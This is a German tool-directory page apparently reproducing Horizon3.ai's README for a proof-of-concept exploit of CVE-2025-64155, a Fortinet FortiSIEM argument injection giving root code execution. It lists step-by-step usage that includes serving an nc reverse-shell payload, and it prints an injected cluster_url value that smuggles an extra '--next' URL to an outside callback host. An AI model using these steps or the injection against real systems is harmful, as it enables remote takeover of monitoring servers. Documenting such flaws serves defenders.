Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-64155 — CVE-2025-64155: Fortinet FortiSIEM Argument Injection zu Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/horizon3ai/cve-2025-64155
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubhorizon3ai/cve-2025-64155

CVE-2025-64155

CVE-2025-64155: Fortinet FortiSIEM Argument Injection zu Remote-Codeausführung

Repository anzeigen
332vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-64155: Fortinet FortiSIEM Argument-Injection zur Remote-Code-Ausführung

Proof-of-Concept-Exploit für Fortinet FortiSIEM, der eine Argument-Injection ausnutzt, um eine Datei zu schreiben und Codeausführung als root zu erlangen

Blogbeitrag

Detaillierte Analyse hier: Horizon3.ai - CVE-2025-64155: Drei Jahre Remote-Rooting des Fortinet FortiSIEM

Hinweis

Das Ausnutzen dieses Problems zum Überschreiben von Anwendungsdateien führt wahrscheinlich zu Systeminstabilitäten. Gehen Sie vorsichtig vor. Überprüfungen können harmlos durchgeführt werden, indem cluster_url wie folgt bearbeitet wird: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>

Verwendung

  1. Bearbeiten Sie das Payload im Webserver serve.py auf das gewünschte Payload (z.B. nc Reverse Shell)
  2. Bearbeiten Sie die cluster_url in CVE-2025-64155.py, sodass sie auf die Basis-URL des Servers zeigt, auf dem serve.py läuft (z.B. http://10.0.40.83:9200)
  3. Führen Sie den Webserver serve.py aus
  • Führen Sie den Exploit CVE-2025-64155.py aus
  • Warten Sie etwa 1 Minute, bis der Cron-Job das Payload ausführt
  • root@kitploit:~
    % python3 CVE-2025-64155.py -h
    usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
    
    options:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            The IP address of the target
      -p PORT, --port PORT  The port of the Phoenix Monitor service
    

    Folgen Sie dem Horizon3.ai Attack Team auf Twitter für die neueste Sicherheitsforschung:

    • Horizon3 Attack Team
    • James Horseman
    • Zach Hanley

    Haftungsausschluss

    Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Nutzen Sie sie verantwortungsbewusst.

    Tool herunterladen